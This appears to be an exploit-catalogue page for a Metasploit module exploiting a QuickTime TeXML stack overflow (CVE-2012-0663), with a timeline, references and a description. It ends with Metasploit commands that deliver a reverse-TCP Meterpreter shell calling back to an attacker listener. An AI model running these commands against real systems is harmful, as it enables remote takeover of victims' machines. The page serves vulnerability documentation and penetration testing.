Timeline :
Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27
PoC provided by :
Alexander Gavrun
sinn3r
juan vazquez
Reference(s) :
CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222
Affected version(s) :
QuickTime version 7.7.1 and previous
Tested on Windows XP Pro SP3 with :
QuickTime 7.7.1
Description :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.
Commands :
use exploit/windows/fileformat/apple_quicktime_texml set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit -j sysinfo getuid